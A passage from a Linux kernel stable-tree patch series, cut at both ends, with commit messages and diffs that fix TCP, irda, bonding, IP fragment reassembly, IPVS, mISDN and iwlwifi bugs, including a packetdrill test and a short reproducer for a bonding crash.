__ubsan_handle_type_mismatch+0x157/0x411 [] irlmp_connect_request+0x7ac/0x970 [] iriap_connect_request+0xa0/0x160 [] state_s_disconnect+0x88/0xd0 [] iriap_do_client_event+0x94/0x120 [] iriap_getvaluebyclass_request+0x3e0/0x6d0 [] irda_find_lsap_sel+0x1eb/0x630 [] irda_connect+0x828/0x12d0 [] SYSC_connect+0x22b/0x340 [] SyS_connect+0x9/0x10 [] do_syscall_64+0x1b3/0x4b0 [] entry_SYSCALL64_slow_path+0x25/0x25 ================================================================================ The bug seems to have been around since forever. There's more problems with missing error checks in iriap_init() (and indeed all of irda_init()), but that's a bigger problem that needs very careful review and testing. This patch will fix the most serious bug (as it's easily reached from unprivileged userspace). I have tested my patch with a reproducer. Signed-off-by: Vegard Nossum Signed-off-by: David S. Miller Signed-off-by: Willy Tarreau --- net/irda/iriap.c | 8 ++++++-- 1 file changed, 6 insertions(+), 2 deletions(-) diff --git a/net/irda/iriap.c b/net/irda/iriap.c index e1b37f5a269..bd42516e268 100644 --- a/net/irda/iriap.c +++ b/net/irda/iriap.c @@ -191,8 +191,12 @@ struct iriap_cb *iriap_open(__u8 slsap_sel, int mode, void *priv, self->magic = IAS_MAGIC; self->mode = mode; - if (mode == IAS_CLIENT) - iriap_register_lsap(self, slsap_sel, mode); + if (mode == IAS_CLIENT) { + if (iriap_register_lsap(self, slsap_sel, mode)) { + kfree(self); + return NULL; + } + } self->confirm = callback; self->priv = priv; From 13403121e729df59dd92d9e4054293d91a004bf5 Mon Sep 17 00:00:00 2001 From: Eric Dumazet Date: Wed, 17 Aug 2016 05:56:26 -0700 Subject: [PATCH 233/315] tcp: fix use after free in tcp_xmit_retransmit_queue() MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit commit bb1fceca22492109be12640d49f5ea5a544c6bb4 upstream. When tcp_sendmsg() allocates a fresh and empty skb, it puts it at the tail of the write queue using tcp_add_write_queue_tail() Then it attempts to copy user data into this fresh skb. If the copy fails, we undo the work and remove the fresh skb. Unfortunately, this undo lacks the change done to tp->highest_sack and we can leave a dangling pointer (to a freed skb) Later, tcp_xmit_retransmit_queue() can dereference this pointer and access freed memory. For regular kernels where memory is not unmapped, this might cause SACK bugs because tcp_highest_sack_seq() is buggy, returning garbage instead of tp->snd_nxt, but with various debug features like CONFIG_DEBUG_PAGEALLOC, this can crash the kernel. This bug was found by Marco Grassi thanks to syzkaller. Fixes: 6859d49475d4 ("[TCP]: Abstract tp->highest_sack accessing & point to next skb") Reported-by: Marco Grassi Signed-off-by: Eric Dumazet Cc: Ilpo Järvinen Cc: Yuchung Cheng Cc: Neal Cardwell Acked-by: Neal Cardwell Reviewed-by: Cong Wang Signed-off-by: David S. Miller Signed-off-by: Willy Tarreau --- include/net/tcp.h | 2 ++ 1 file changed, 2 insertions(+) diff --git a/include/net/tcp.h b/include/net/tcp.h index 29a1a63cd30..1c5e037f78d 100644 --- a/include/net/tcp.h +++ b/include/net/tcp.h @@ -1392,6 +1392,8 @@ static inline void tcp_check_send_head(struct sock *sk, struct sk_buff *skb_unli { if (sk->sk_send_head == skb_unlinked) sk->sk_send_head = NULL; + if (tcp_sk(sk)->highest_sack == skb_unlinked) + tcp_sk(sk)->highest_sack = NULL; } static inline void tcp_init_send_head(struct sock *sk) From 1c50d3ae6df65a82fe814d9c368dc13e9cd8271f Mon Sep 17 00:00:00 2001 From: Eric Dumazet Date: Mon, 22 Aug 2016 11:31:10 -0700 Subject: [PATCH 234/315] tcp: properly scale window in tcp_v[46]_reqsk_send_ack() commit 20a2b49fc538540819a0c552877086548cff8d8d upstream. When sending an ack in SYN_RECV state, we must scale the offered window if wscale option was negotiated and accepted. Tested: Following packetdrill test demonstrates the issue : 0.000 socket(..., SOCK_STREAM, IPPROTO_TCP) = 3 +0 setsockopt(3, SOL_SOCKET, SO_REUSEADDR, [1], 4) = 0 +0 bind(3, ..., ...) = 0 +0 listen(3, 1) = 0 // Establish a connection. +0 < S 0:0(0) win 20000 +0 > S. 0:0(0) ack 1 win 28960 +0 < . 1:11(10) ack 1 win 156 // check that window is properly scaled ! +0 > . 1:1(0) ack 1 win 226 Signed-off-by: Eric Dumazet Cc: Yuchung Cheng Cc: Neal Cardwell Acked-by: Yuchung Cheng Acked-by: Neal Cardwell Signed-off-by: David S. Miller Signed-off-by: Willy Tarreau --- net/ipv4/tcp_ipv4.c | 3 ++- net/ipv6/tcp_ipv6.c | 8 +++++++- 2 files changed, 9 insertions(+), 2 deletions(-) diff --git a/net/ipv4/tcp_ipv4.c b/net/ipv4/tcp_ipv4.c index 11f27a45b8e..5401fbf2df8 100644 --- a/net/ipv4/tcp_ipv4.c +++ b/net/ipv4/tcp_ipv4.c @@ -824,7 +824,8 @@ static void tcp_v4_reqsk_send_ack(struct sock *sk, struct sk_buff *skb, */ tcp_v4_send_ack(skb, (sk->sk_state == TCP_LISTEN) ? tcp_rsk(req)->snt_isn + 1 : tcp_sk(sk)->snd_nxt, - tcp_rsk(req)->rcv_nxt, req->rcv_wnd, + tcp_rsk(req)->rcv_nxt, + req->rcv_wnd >> inet_rsk(req)->rcv_wscale, tcp_time_stamp, req->ts_recent, 0, diff --git a/net/ipv6/tcp_ipv6.c b/net/ipv6/tcp_ipv6.c index 41c026f11ed..d8237383b40 100644 --- a/net/ipv6/tcp_ipv6.c +++ b/net/ipv6/tcp_ipv6.c @@ -902,8 +902,14 @@ static void tcp_v6_timewait_ack(struct sock *sk, struct sk_buff *skb) static void tcp_v6_reqsk_send_ack(struct sock *sk, struct sk_buff *skb, struct request_sock *req) { + /* RFC 7323 2.3 + * The window field (SEG.WND) of every outgoing segment, with the + * exception of segments, MUST be right-shifted by + * Rcv.Wind.Shift bits: + */ tcp_v6_send_ack(skb, tcp_rsk(req)->snt_isn + 1, tcp_rsk(req)->rcv_isn + 1, - req->rcv_wnd, tcp_time_stamp, req->ts_recent, + req->rcv_wnd >> inet_rsk(req)->rcv_wscale, + tcp_time_stamp, req->ts_recent, tcp_v6_md5_do_lookup(sk, &ipv6_hdr(skb)->daddr), 0); } From 93522d310c31a54973def2a6ea15d3b418045f49 Mon Sep 17 00:00:00 2001 From: Eric Dumazet Date: Thu, 15 Sep 2016 08:12:33 -0700 Subject: [PATCH 235/315] tcp: fix overflow in __tcp_retransmit_skb() commit ffb4d6c8508657824bcef68a36b2a0f9d8c09d10 upstream. If a TCP socket gets a large write queue, an overflow can happen in a test in __tcp_retransmit_skb() preventing all retransmits. The flow then stalls and resets after timeouts. Tested: sysctl -w net.core.wmem_max=1000000000 netperf -H dest -- -s 1000000000 Signed-off-by: Eric Dumazet Signed-off-by: David S. Miller Signed-off-by: Willy Tarreau --- net/ipv4/tcp_output.c | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/net/ipv4/tcp_output.c b/net/ipv4/tcp_output.c index 276b28301a6..465285bfb57 100644 --- a/net/ipv4/tcp_output.c +++ b/net/ipv4/tcp_output.c @@ -2327,7 +2327,8 @@ int __tcp_retransmit_skb(struct sock *sk, struct sk_buff *skb) * copying overhead: fragmentation, tunneling, mangling etc. */ if (atomic_read(&sk->sk_wmem_alloc) > - min(sk->sk_wmem_queued + (sk->sk_wmem_queued >> 2), sk->sk_sndbuf)) + min_t(u32, sk->sk_wmem_queued + (sk->sk_wmem_queued >> 2), + sk->sk_sndbuf)) return -EAGAIN; if (before(TCP_SKB_CB(skb)->seq, tp->snd_una)) { From d318f82f1c4e3823253fcc9dc2053a46ef7b14a6 Mon Sep 17 00:00:00 2001 From: Douglas Caetano dos Santos Date: Thu, 22 Sep 2016 15:52:04 -0300 Subject: [PATCH 236/315] tcp: fix wrong checksum calculation on MTU probing commit 2fe664f1fcf7c4da6891f95708a7a56d3c024354 upstream. With TCP MTU probing enabled and offload TX checksumming disabled, tcp_mtu_probe() calculated the wrong checksum when a fragment being copied into the probe's SKB had an odd length. This was caused by the direct use of skb_copy_and_csum_bits() to calculate the checksum, as it pads the fragment being copied, if needed. When this fragment was not the last, a subsequent call used the previous checksum without considering this padding. The effect was a stale connection in one way, as even retransmissions wouldn't solve the problem, because the checksum was never recalculated for the full SKB length. Signed-off-by: Douglas Caetano dos Santos Signed-off-by: David S. Miller Signed-off-by: Willy Tarreau --- net/ipv4/tcp_output.c | 12 +++++++----- 1 file changed, 7 insertions(+), 5 deletions(-) diff --git a/net/ipv4/tcp_output.c b/net/ipv4/tcp_output.c index 465285bfb57..1f2f6b5406e 100644 --- a/net/ipv4/tcp_output.c +++ b/net/ipv4/tcp_output.c @@ -1753,12 +1753,14 @@ static int tcp_mtu_probe(struct sock *sk) len = 0; tcp_for_write_queue_from_safe(skb, next, sk) { copy = min_t(int, skb->len, probe_size - len); - if (nskb->ip_summed) + if (nskb->ip_summed) { skb_copy_bits(skb, 0, skb_put(nskb, copy), copy); - else - nskb->csum = skb_copy_and_csum_bits(skb, 0, - skb_put(nskb, copy), - copy, nskb->csum); + } else { + __wsum csum = skb_copy_and_csum_bits(skb, 0, + skb_put(nskb, copy), + copy, 0); + nskb->csum = csum_block_add(nskb->csum, csum, len); + } if (skb->len <= copy) { /* We've eaten all the data from this skb. From 56325d9fb7b138b228577ae99382b70084ab82f3 Mon Sep 17 00:00:00 2001 From: Eric Dumazet Date: Thu, 10 Nov 2016 13:12:35 -0800 Subject: [PATCH 237/315] tcp: take care of truncations done by sk_filter() commit ac6e780070e30e4c35bd395acfe9191e6268bdd3 upstream. With syzkaller help, Marco Grassi found a bug in TCP stack, crashing in tcp_collapse() Root cause is that sk_filter() can truncate the incoming skb, but TCP stack was not really expecting this to happen. It probably was expecting a simple DROP or ACCEPT behavior. We first need to make sure no part of TCP header could be removed. Then we need to adjust TCP_SKB_CB(skb)->end_seq Many thanks to syzkaller team and Marco for giving us a reproducer. Signed-off-by: Eric Dumazet Reported-by: Marco Grassi Reported-by: Vladis Dronov Signed-off-by: David S. Miller Signed-off-by: Willy Tarreau --- include/linux/filter.h | 6 +++++- include/net/tcp.h | 1 + net/core/filter.c | 10 +++++----- net/ipv4/tcp_ipv4.c | 19 ++++++++++++++++++- net/ipv6/tcp_ipv6.c | 6 ++++-- 5 files changed, 33 insertions(+), 9 deletions(-) diff --git a/include/linux/filter.h b/include/linux/filter.h index f65f5a69db8..c2bea01d046 100644 --- a/include/linux/filter.h +++ b/include/linux/filter.h @@ -36,7 +36,11 @@ static inline unsigned int sk_filter_len(const struct sk_filter *fp) return fp->len * sizeof(struct sock_filter) + sizeof(*fp); } -extern int sk_filter(struct sock *sk, struct sk_buff *skb); +int sk_filter_trim_cap(struct sock *sk, struct sk_buff *skb, unsigned int cap); +static inline int sk_filter(struct sock *sk, struct sk_buff *skb) +{ + return sk_filter_trim_cap(sk, skb, 1); +} extern unsigned int sk_run_filter(const struct sk_buff *skb, const struct sock_filter *filter); extern int sk_unattached_filter_create(struct sk_filter **pfp, diff --git a/include/net/tcp.h b/include/net/tcp.h index 1c5e037f78d..79cd118d599 100644 --- a/include/net/tcp.h +++ b/include/net/tcp.h @@ -1029,6 +1029,7 @@ static inline void tcp_prequeue_init(struct tcp_sock *tp) } extern bool tcp_prequeue(struct sock *sk, struct sk_buff *skb); +int tcp_filter(struct sock *sk, struct sk_buff *skb); #undef STATE_TRACE diff --git a/net/core/filter.c b/net/core/filter.c index c6c18d8a2d8..65f2a65b533 100644 --- a/net/core/filter.c +++ b/net/core/filter.c @@ -67,9 +67,10 @@ static inline void *load_pointer(const struct sk_buff *skb, int k, } /** - * sk_filter - run a packet through a socket filter + * sk_filter_trim_cap - run a packet through a socket filter * @sk: sock associated with &sk_buff * @skb: buffer to filter + * @cap: limit on how short the eBPF program may trim the packet * * Run the filter code and then cut skb->data to correct size returned by * sk_run_filter. If pkt_len is 0 we toss packet. If skb->len is smaller @@ -78,7 +79,7 @@ static inline void *load_pointer(const struct sk_buff *skb, int k, * be accepted or -EPERM if the packet should be tossed. * */ -int sk_filter(struct sock *sk, struct sk_buff *skb) +int sk_filter_trim_cap(struct sock *sk, struct sk_buff *skb, unsigned int cap) { int err; struct sk_filter *filter; @@ -99,14 +100,13 @@ int sk_filter(struct sock *sk, struct sk_buff *skb) filter = rcu_dereference(sk->sk_filter); if (filter) { unsigned int pkt_len = SK_RUN_FILTER(filter, skb); - - err = pkt_len ? pskb_trim(skb, pkt_len) : -EPERM; + err = pkt_len ? pskb_trim(skb, max(cap, pkt_len)) : -EPERM; } rcu_read_unlock(); return err; } -EXPORT_SYMBOL(sk_filter); +EXPORT_SYMBOL(sk_filter_trim_cap); /** * sk_run_filter - run a filter on a socket diff --git a/net/ipv4/tcp_ipv4.c b/net/ipv4/tcp_ipv4.c index 5401fbf2df8..6504a085ca6 100644 --- a/net/ipv4/tcp_ipv4.c +++ b/net/ipv4/tcp_ipv4.c @@ -1959,6 +1959,21 @@ bool tcp_prequeue(struct sock *sk, struct sk_buff *skb) } EXPORT_SYMBOL(tcp_prequeue); +int tcp_filter(struct sock *sk, struct sk_buff *skb) +{ + struct tcphdr *th = (struct tcphdr *)skb->data; + unsigned int eaten = skb->len; + int err; + + err = sk_filter_trim_cap(sk, skb, th->doff * 4); + if (!err) { + eaten -= skb->len; + TCP_SKB_CB(skb)->end_seq -= eaten; + } + return err; +} +EXPORT_SYMBOL(tcp_filter); + /* * From tcp_input.c */ @@ -2021,8 +2036,10 @@ process: goto discard_and_relse; nf_reset(skb); - if (sk_filter(sk, skb)) + if (tcp_filter(sk, skb)) goto discard_and_relse; + th = (const struct tcphdr *)skb->data; + iph = ip_hdr(skb); skb->dev = NULL; diff --git a/net/ipv6/tcp_ipv6.c b/net/ipv6/tcp_ipv6.c index d8237383b40..70b10ed169a 100644 --- a/net/ipv6/tcp_ipv6.c +++ b/net/ipv6/tcp_ipv6.c @@ -1330,7 +1330,7 @@ static int tcp_v6_do_rcv(struct sock *sk, struct sk_buff *skb) goto discard; #endif - if (sk_filter(sk, skb)) + if (tcp_filter(sk, skb)) goto discard; /* @@ -1501,8 +1501,10 @@ process: if (!xfrm6_policy_check(sk, XFRM_POLICY_IN, skb)) goto discard_and_relse; - if (sk_filter(sk, skb)) + if (tcp_filter(sk, skb)) goto discard_and_relse; + th = (const struct tcphdr *)skb->data; + hdr = ipv6_hdr(skb); skb->dev = NULL; From 745db35452567cca10e92a2b0c70d85494c1ad0e Mon Sep 17 00:00:00 2001 From: Mahesh Bandewar Date: Thu, 1 Sep 2016 22:18:34 -0700 Subject: [PATCH 238/315] bonding: Fix bonding crash commit 24b27fc4cdf9e10c5e79e5923b6b7c2c5c95096c upstream. Following few steps will crash kernel - (a) Create bonding master > modprobe bonding miimon=50 (b) Create macvlan bridge on eth2 > ip link add link eth2 dev mvl0 address aa:0:0:0:0:01 \ type macvlan (c) Now try adding eth2 into the bond > echo +eth2 > /sys/class/net/bond0/bonding/slaves Bonding does lots of things before checking if the device enslaved is busy or not. In this case when the notifier call-chain sends notifications, the bond_netdev_event() assumes that the rx_handler /rx_handler_data is registered while the bond_enslave() hasn't progressed far enough to register rx_handler for the new slave. This patch adds a rx_handler check that can be performed right at the beginning of the enslave code to avoid getting into this situation. Signed-off-by: Mahesh Bandewar Acked-by: Eric Dumazet Signed-off-by: David S. Miller Signed-off-by: Willy Tarreau --- drivers/net/bonding/bond_main.c | 7 ++++--- include/linux/netdevice.h | 1 + net/core/dev.c | 16 ++++++++++++++++ 3 files changed, 21 insertions(+), 3 deletions(-) diff --git a/drivers/net/bonding/bond_main.c b/drivers/net/bonding/bond_main.c index c0ed7c80281..ce41616d9d1 100644 --- a/drivers/net/bonding/bond_main.c +++ b/drivers/net/bonding/bond_main.c @@ -1565,9 +1565,10 @@ int bond_enslave(struct net_device *bond_dev, struct net_device *slave_dev) bond_dev->name, slave_dev->name); } - /* already enslaved */ - if (slave_dev->flags & IFF_SLAVE) { - pr_debug("Error, Device was already enslaved\n"); + /* already in-use? */ + if (netdev_is_rx_handler_busy(slave_dev)) { + netdev_err(bond_dev, + "Error: Device is in use and cannot be enslaved\n"); return -EBUSY; } diff --git a/include/linux/netdevice.h b/include/linux/netdevice.h index 4d2e0418ab5..45a618b5886 100644 --- a/include/linux/netdevice.h +++ b/include/linux/netdevice.h @@ -2223,6 +2223,7 @@ static inline void napi_free_frags(struct napi_struct *napi) napi->skb = NULL; } +bool netdev_is_rx_handler_busy(struct net_device *dev); extern int netdev_rx_handler_register(struct net_device *dev, rx_handler_func_t *rx_handler, void *rx_handler_data); diff --git a/net/core/dev.c b/net/core/dev.c index 1ccfc49683b..408f6eea2fb 100644 --- a/net/core/dev.c +++ b/net/core/dev.c @@ -3345,6 +3345,22 @@ out: } #endif +/** + * netdev_is_rx_handler_busy - check if receive handler is registered + * @dev: device to check + * + * Check if a receive handler is already registered for a given device. + * Return true if there one. + * + * The caller must hold the rtnl_mutex. + */ +bool netdev_is_rx_handler_busy(struct net_device *dev) +{ + ASSERT_RTNL(); + return dev && rtnl_dereference(dev->rx_handler); +} +EXPORT_SYMBOL_GPL(netdev_is_rx_handler_busy); + /** * netdev_rx_handler_register - register receive handler * @dev: device to register a handler for From 49c201c12a087a8437badfe0f5075661c75c447a Mon Sep 17 00:00:00 2001 From: Konstantin Khlebnikov Date: Fri, 17 Jul 2015 14:01:11 +0300 Subject: [PATCH 239/315] net: ratelimit warnings about dst entry refcount underflow or overflow commit 8bf4ada2e21378816b28205427ee6b0e1ca4c5f1 upstream. Kernel generates a lot of warnings when dst entry reference counter overflows and becomes negative. That bug was seen several times at machines with outdated 3.10.y kernels. Most like it's already fixed in upstream. Anyway that flood completely kills machine and makes further debugging impossible. Signed-off-by: Konstantin Khlebnikov Signed-off-by: David S. Miller Signed-off-by: Willy Tarreau --- net/core/dst.c | 4 +++- 1 file changed, 3 insertions(+), 1 deletion(-) diff --git a/net/core/dst.c b/net/core/dst.c index 1bf6842b89b..582b861aeba 100644 --- a/net/core/dst.c +++ b/net/core/dst.c @@ -283,7 +283,9 @@ void dst_release(struct dst_entry *dst) unsigned short nocache = dst->flags & DST_NOCACHE; newrefcnt = atomic_dec_return(&dst->__refcnt); - WARN_ON(newrefcnt < 0); + if (unlikely(newrefcnt < 0)) + net_warn_ratelimited("%s: dst:%p refcnt:%d\n", + __func__, dst, newrefcnt); if (!newrefcnt && unlikely(nocache)) call_rcu(&dst->rcu_head, dst_destroy_rcu); } From 54fbda50191321d8ee0593213a2bd6adee9e855b Mon Sep 17 00:00:00 2001 From: "Maciej S. Szmigiero" Date: Sun, 13 Mar 2016 00:19:07 +0100 Subject: [PATCH 240/315] mISDN: Support DR6 indication in mISDNipac driver commit 1e1589ad8b5cb5b8a6781ba5850cf710ada0e919 upstream. According to figure 39 in PEB3086 data sheet, version 1.4 this indication replaces DR when layer 1 transition source state is F6. This fixes mISDN layer 1 getting stuck in F6 state in TE mode on Dialogic Diva 2.02 card (and possibly others) when NT deactivates it. Signed-off-by: Maciej S. Szmigiero Acked-by: Karsten Keil Signed-off-by: David S. Miller Signed-off-by: Willy Tarreau --- drivers/isdn/hardware/mISDN/ipac.h | 1 + drivers/isdn/hardware/mISDN/mISDNipac.c | 2 ++ 2 files changed, 3 insertions(+) diff --git a/drivers/isdn/hardware/mISDN/ipac.h b/drivers/isdn/hardware/mISDN/ipac.h index 8121e046b73..31fb3b0fd0e 100644 --- a/drivers/isdn/hardware/mISDN/ipac.h +++ b/drivers/isdn/hardware/mISDN/ipac.h @@ -217,6 +217,7 @@ struct ipac_hw { #define ISAC_IND_DR 0x0 #define ISAC_IND_SD 0x2 #define ISAC_IND_DIS 0x3 +#define ISAC_IND_DR6 0x5 #define ISAC_IND_EI 0x6 #define ISAC_IND_RSY 0x4 #define ISAC_IND_ARD 0x8 diff --git a/drivers/isdn/hardware/mISDN/mISDNipac.c b/drivers/isdn/hardware/mISDN/mISDNipac.c index ccd7d851be2..bac920c6022 100644 --- a/drivers/isdn/hardware/mISDN/mISDNipac.c +++ b/drivers/isdn/hardware/mISDN/mISDNipac.c @@ -80,6 +80,7 @@ isac_ph_state_bh(struct dchannel *dch) l1_event(dch->l1, HW_DEACT_CNF); break; case ISAC_IND_DR: + case ISAC_IND_DR6: dch->state = 3; l1_event(dch->l1, HW_DEACT_IND); break; @@ -660,6 +661,7 @@ isac_l1cmd(struct dchannel *dch, u32 cmd) spin_lock_irqsave(isac->hwlock, flags); if ((isac->state == ISAC_IND_EI) || (isac->state == ISAC_IND_DR) || + (isac->state == ISAC_IND_DR6) || (isac->state == ISAC_IND_RS)) ph_command(isac, ISAC_CMD_TIM); else From eec89a779ca280a068c97ce2309961ebe83c2ce3 Mon Sep 17 00:00:00 2001 From: Emrah Demir Date: Fri, 8 Apr 2016 22:16:11 +0300 Subject: [PATCH 241/315] mISDN: Fixing missing validation in base_sock_bind() commit b821646826e22f0491708768fccce58eef3f5704 upstream. Add validation code into mISDN/socket.c Signed-off-by: Emrah Demir Signed-off-by: David S. Miller Signed-off-by: Willy Tarreau --- drivers/isdn/mISDN/socket.c | 3 +++ 1 file changed, 3 insertions(+) diff --git a/drivers/isdn/mISDN/socket.c b/drivers/isdn/mISDN/socket.c index 5cefb479c70..00bd80a6389 100644 --- a/drivers/isdn/mISDN/socket.c +++ b/drivers/isdn/mISDN/socket.c @@ -717,6 +717,9 @@ base_sock_bind(struct socket *sock, struct sockaddr *addr, int addr_len) if (!maddr || maddr->family != AF_ISDN) return -EINVAL; + if (addr_len < sizeof(struct sockaddr_mISDN)) + return -EINVAL; + lock_sock(sk); if (_pms(sk)->dev) { From 5a0b77dcdb3baf1d076864289098683e6a9d96f9 Mon Sep 17 00:00:00 2001 From: Michal Kubecek Date: Mon, 9 May 2016 11:01:04 +0200 Subject: [PATCH 242/315] net: disable fragment reassembly if high_thresh is set to zero commit 30759219f562cfaaebe7b9c1d1c0e6b5445c69b0 upstream. Before commit 6d7b857d541e ("net: use lib/percpu_counter API for fragmentation mem accounting"), setting high threshold to 0 prevented fragment reassembly as first fragment would be always evicted before second could be added to the queue. While inefficient, some users apparently relied on it. Since the commit mentioned above, a percpu counter is used for reassembly memory accounting and high batch size avoids taking slow path in most common scenarios. As a result, a whole full sized packet can be reassembled without the percpu counter's main counter changing its value so that even with high_thresh set to 0, fragmented packets can be still reassembled and processed. Add explicit checks preventing reassembly if high threshold is zero. [mk] backport to 3.12 Signed-off-by: Michal Kubecek Signed-off-by: Jiri Slaby Signed-off-by: Willy Tarreau --- net/ipv4/ip_fragment.c | 4 ++++ net/ipv6/netfilter/nf_conntrack_reasm.c | 3 +++ net/ipv6/reassembly.c | 4 ++++ 3 files changed, 11 insertions(+) diff --git a/net/ipv4/ip_fragment.c b/net/ipv4/ip_fragment.c index 4d98a6b80b0..04c7e461800 100644 --- a/net/ipv4/ip_fragment.c +++ b/net/ipv4/ip_fragment.c @@ -656,6 +656,9 @@ int ip_defrag(struct sk_buff *skb, u32 user) net = skb->dev ? dev_net(skb->dev) : dev_net(skb_dst(skb)->dev); IP_INC_STATS_BH(net, IPSTATS_MIB_REASMREQDS); + if (!net->ipv4.frags.high_thresh) + goto fail; + /* Start by cleaning up the memory. */ ip_evictor(net); @@ -672,6 +675,7 @@ int ip_defrag(struct sk_buff *skb, u32 user) return ret; } +fail: IP_INC_STATS_BH(net, IPSTATS_MIB_REASMFAILS); kfree_skb(skb); return -ENOMEM; diff --git a/net/ipv6/netfilter/nf_conntrack_reasm.c b/net/ipv6/netfilter/nf_conntrack_reasm.c index 7cd62358853..c11a40caf5b 100644 --- a/net/ipv6/netfilter/nf_conntrack_reasm.c +++ b/net/ipv6/netfilter/nf_conntrack_reasm.c @@ -569,6 +569,9 @@ struct sk_buff *nf_ct_frag6_gather(struct sk_buff *skb, u32 user) if (find_prev_fhdr(skb, &prevhdr, &nhoff, &fhoff) < 0) return skb; + if (!net->nf_frag.frags.high_thresh) + return skb; + clone = skb_clone(skb, GFP_ATOMIC); if (clone == NULL) { pr_debug("Can't clone skb\n"); diff --git a/net/ipv6/reassembly.c b/net/ipv6/reassembly.c index a1fb511da3b..1a5318efa31 100644 --- a/net/ipv6/reassembly.c +++ b/net/ipv6/reassembly.c @@ -556,6 +556,9 @@ static int ipv6_frag_rcv(struct sk_buff *skb) return 1; } + if (!net->ipv6.frags.high_thresh) + goto fail_mem; + evicted = inet_frag_evictor(&net->ipv6.frags, &ip6_frags, false); if (evicted) IP6_ADD_STATS_BH(net, ip6_dst_idev(skb_dst(skb)), @@ -575,6 +578,7 @@ static int ipv6_frag_rcv(struct sk_buff *skb) return ret; } +fail_mem: IP6_INC_STATS_BH(net, ip6_dst_idev(skb_dst(skb)), IPSTATS_MIB_REASMFAILS); kfree_skb(skb); return -1; From d53b66097ef0ed4569016c7241fc5a9a91c5f488 Mon Sep 17 00:00:00 2001 From: Michal Kubecek Date: Fri, 3 Jun 2016 17:56:50 +0200 Subject: [PATCH 243/315] ipvs: count pre-established TCP states as active commit be2cef49904b34dd5f75d96bbc8cd8341bab1bc0 upstream. Some users observed that "least connection" distribution algorithm doesn't handle well bursts of TCP connections from reconnecting clients after a node or network failure. This is because the algorithm counts active connection as worth 256 inactive ones where for TCP, "active" only means TCP connections in ESTABLISHED state. In case of a connection burst, new connections are handled before previous ones have finished the three way handshaking so that all are still counted as "inactive", i.e. cheap ones. The become "active" quickly but at that time, all of them are already assigned to one real server (or few), resulting in highly unbalanced distribution. Address this by counting the "pre-established" states as "active". Signed-off-by: Michal Kubecek Acked-by: Julian Anastasov Signed-off-by: Simon Horman Signed-off-by: Willy Tarreau --- net/netfilter/ipvs/ip_vs_proto_tcp.c | 25 +++++++++++++++++++++++-- 1 file changed, 23 insertions(+), 2 deletions(-) diff --git a/net/netfilter/ipvs/ip_vs_proto_tcp.c b/net/netfilter/ipvs/ip_vs_proto_tcp.c index 50a15944c6c..3032ede74e4 100644 --- a/net/netfilter/ipvs/ip_vs_proto_tcp.c +++ b/net/netfilter/ipvs/ip_vs_proto_tcp.c @@ -373,6 +373,20 @@ static const char *const tcp_state_name_table[IP_VS_TCP_S_LAST+1] = { [IP_VS_TCP_S_LAST] = "BUG!", }; +static const bool tcp_state_active_table[IP_VS_TCP_S_LAST] = { + [IP_VS_TCP_S_NONE] = false, + [IP_VS_TCP_S_ESTABLISHED] = true, + [IP_VS_TCP_S_SYN_SENT] = true, + [IP_VS_TCP_S_SYN_RECV] = true, + [IP_VS_TCP_S_FIN_WAIT] = false, + [IP_VS_TCP_S_TIME_WAIT] = false, + [IP_VS_TCP_S_CLOSE] = false, + [IP_VS_TCP_S_CLOSE_WAIT] = false, + [IP_VS_TCP_S_LAST_ACK] = false, + [IP_VS_TCP_S_LISTEN] = false, + [IP_VS_TCP_S_SYNACK] = true, +}; + #define sNO IP_VS_TCP_S_NONE #define sES IP_VS_TCP_S_ESTABLISHED #define sSS IP_VS_TCP_S_SYN_SENT @@ -396,6 +410,13 @@ static const char * tcp_state_name(int state) return tcp_state_name_table[state] ? tcp_state_name_table[state] : "?"; } +static bool tcp_state_active(int state) +{ + if (state >= IP_VS_TCP_S_LAST) + return false; + return tcp_state_active_table[state]; +} + static struct tcp_states_t tcp_states [] = { /* INPUT */ /* sNO, sES, sSS, sSR, sFW, sTW, sCL, sCW, sLA, sLI, sSA */ @@ -518,12 +539,12 @@ set_tcp_state(struct ip_vs_proto_data *pd, struct ip_vs_conn *cp, if (dest) { if (!(cp->flags & IP_VS_CONN_F_INACTIVE) && - (new_state != IP_VS_TCP_S_ESTABLISHED)) { + !tcp_state_active(new_state)) { atomic_dec(&dest->activeconns); atomic_inc(&dest->inactconns); cp->flags |= IP_VS_CONN_F_INACTIVE; } else if ((cp->flags & IP_VS_CONN_F_INACTIVE) && - (new_state == IP_VS_TCP_S_ESTABLISHED)) { + tcp_state_active(new_state)) { atomic_inc(&dest->activeconns); atomic_dec(&dest->inactconns); cp->flags &= ~IP_VS_CONN_F_INACTIVE; From 8d83a53854e4034e92e33c1eff4b069ef8e3b89f Mon Sep 17 00:00:00 2001 From: Sara Sharon Date: Thu, 9 Jun 2016 17:19:35 +0300 Subject: [PATCH 244/315] iwlwifi: pcie: fix access to scratch buffer commit d5d0689aefc59c6a5352ca25d7e6d47d03f543ce upstream. This fixes a pretty ancient bug that hasn't manifested itself until now. The scratchbuf for command queue is allocated only for 32 slots but is accessed with the queue write pointer - which can be up to 256. Since the scratch buf size was 16 and there are up to 256 TFDs we never passed a page boundary when accessing the scratch buffer, but when attempting to increase the size of the scratch buffer a panic was quick to follow when trying to access the address resulted in a page boundary. Signed-off-by: Sara Sharon Fixes: 38c0f334b359 ("iwlwifi: use coherent DMA memory for command header") Signed-off-by: Luca Coelho Signed-off-by: Willy Tarreau --- drivers/net/wireless/iwlwifi/pcie/tx.c | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/drivers/net/wireless/iwlwifi/pcie/tx.c b/drivers/net/wireless/iwlwifi/pcie/tx.c index f05962c3249..2e3a0d73f09 100644 --- a/drivers/net/wireless/iwlwifi/pcie/tx.c +++ b/drivers/net/wireless/iwlwifi/pcie/tx.c @@ -1311,9 +1311,9 @@ static int iwl_pcie_enqueue_hcmd(struct iwl_trans *trans, /* start the TFD with the scratchbuf */ scratch_size = min_t(int, copy_size, IWL_HCMD_SCRATCHBUF_SIZE); - memcpy(&txq->scratchbufs[q->write_ptr], &out_cmd->hdr, scratch_size); + memcpy(&txq->scratchbufs[idx], &out_cmd->hdr, scratch_size); iwl_pcie_txq_build_tfd(trans, txq, - iwl_pcie_get_scratchbuf_dma(txq, q->write_ptr), + iwl_pcie_get_scratchbuf_dma(txq, idx), scratch_size, 1); /* map first command fragment, if any remains */ From 824c2230ed7a87dad0ee1b0511dac7717f822517 Mon Sep 17 00:00:00 2001 From: 